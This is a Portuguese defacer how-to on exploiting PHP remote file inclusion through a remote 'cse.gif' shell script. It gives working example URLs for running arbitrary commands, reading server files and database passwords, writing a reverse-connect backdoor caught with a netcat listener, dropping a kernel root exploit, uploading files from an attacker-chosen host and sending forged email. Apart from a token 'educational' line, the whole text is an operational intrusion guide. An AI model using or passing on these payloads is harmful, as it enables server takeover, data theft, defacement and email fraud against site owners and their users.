Este How-To vai mostrar como defacers alteram as páginas
principais de sites que rodam o php em seu sistemas, siga os passos abaixo
que não tem erro, bom e como sempre tudo para fins educacionais,
Modulo: CMD
Serve para: Executa comandos no servidor diretamente pela
URL.
Exemplo: http://www.sitebugado.com/index.php?corpo=http://www.sitedoxpl.hpg.com.br/cse.gif?&cmd=ls
-al
Explicaçao: Entao usando esses exemplo acima, seria executado o
comando ls -al no servidor, pode-se usar diversor
comandos numa unica linha, sendo seprados por ;(ponto e virgula)
Exemplo:http://www.sitebugado.com/index.php?corpo=http://www.sitedoxpl.hpg.com.br/cse.gif?&cmd=ls
-al;uane -a;id
Modulo: SafeMode
Serve para: Faz listagem de arquivos e pastas do servidor
usando comandos internos da PHP.
Exemplo:http://www.sitebugado.com/index.php?corpo=http://www.sitedoxpl.hpg.com.br/cse.gif?&safemode=1
Explicaçao: Precisa????????????
Modulo: Visualizar Cod Font(See)
Serve para: Visualizar o codigo fonte dos arquvos no servidor.
Na versao 3.3 pra cima basta apernar clicar no
arquivo que o codigo font sera mostrado logo abaixo, mas para isso o modulo
Safemode tem que estar habilitado:
Exemplo:http://www.sitebugado.com/index.php?corpo=http://www.sitedoxpl.hpg.com.br/cse.gif?&see=index.php
Explicaçao: Mostraria o codigo fonte da página index.php
Exemplo:http://www.sitebugado.com/index.php?corpo=http://www.sitedoxpl.hpg.com.br/cse.gif?&safemode=1
Explicaçao: basta clicar no link do arquivo para ver seu codigo
fonte ou clicar na pasta para mudar o local,
navegação completa pelos links.
Modulo: Shell
Serve para: Escreve um backdoor reverso na pasta /tmp.
O arquivo .c deve ser compilado.
Exemplo:http://www.sitebugado.com/index.php?corpo=http://www.sitedoxpl.hpg.com.br/cse.gif?&shell=write
Explicaçao: Cria o arquivo dc-connectback.c na pasta /tmp. Basta
compilar e executar. /tmp/dc-coonetback seuip
porta. Para abrir uma porta no seu pc vc precisa'ra do net cat por exemplo,
usnaod o comando nc -vv -l -p 666 no
caso a posta 666 seria aberta.
Modulo: Kernel
Serve para: Escreve um xpl na pasta /tmp para conseguir
root no sistema.O arquivo .c deve ser compilado
Exemplo:http://www.sitebugado.com/index.php?corpo=http://www.sitedoxpl.hpg.com.br/cse.gif?&kernel=write
Explicaçao: O xpl poderá ser para kernel <= a 2.4.18
ou para <= a 2.4.22
Modulo: Upload xpl/backdoor (dx - hostxpl - storage)
Serve para: Com este modulo é simples e facil fazer
upload de qualquer arquivo compilado ao nao paras o servidor
Exemplo:http://www.sitebugado.com/index.php?corpo=http://www.sitedoxpl.hpg.com.br/cse.gif?&dx=1&hostxpl=http://www
.site.com/xpl&storage=/tmp
Explicaçao: &dx=1 => Define o modulo de upload como ativo
&hostxpl=http://www.site.com/xpl => Url de onde o xpl ou ualquer
outro arquivo esteja
&storage=/tmp => local onde o arquivo será escrito
Modulo: Visualizar codigo cont colorido (sfc)
Serve para: Visualizar codigo cont colorido, ficanod mais
facil a detecáo de senhas de banco de dados e depois
funçoes da php.
Exemplo:http://www.sitebugado.com/index.php?corpo=http://www.sitedoxpl.hpg.com.br/cse.gif?&sfc=arquivo.php
Modulo: Visualiazar informaçoes de arquivo.
(fileinfo - filanalize)
Serve para: Precisa explicar???
Exemplo:http://www.sitebugado.com/index.php?corpo=http://www.sitedoxpl.hpg.com.br/cse.gif?&fileinfo=1&fileanalize=
arquivo
Explicaçao: &fileinfo=1 => habilita o modulo de informaçao.
&fileanalize=aquivo => Nome do arquivo a ser analizado.
Modulo: Mail fake
Serve para: putz!!! Server pra manda um fame mail - pode
mandar email DE QUEM para quem para quiser. Obs: mesmo
que o servidor esteja em safemode ow qualquer outro tipo de proteçao
esse modulo deve funcionar. Se apacer escrito
data cha0s na tela com as informaçoes do sistema, essa funçao
ira funcionar na maioria dos casos.
Exemplo:http://www.sitebugado.com/index.php?corpo=http://www.sitedoxpl.hpg.com.br/cse.gif?&fake=1
Explicaçao: Sera mostrado na página um formulário
com os devidos campos para postagem do fake mail.
O xpl encontra-se nesse server com o nome de cse.gif
Versao para windows: csewin.gif
by Cr4shyng - irc.brasnet.org
#datacha0s
|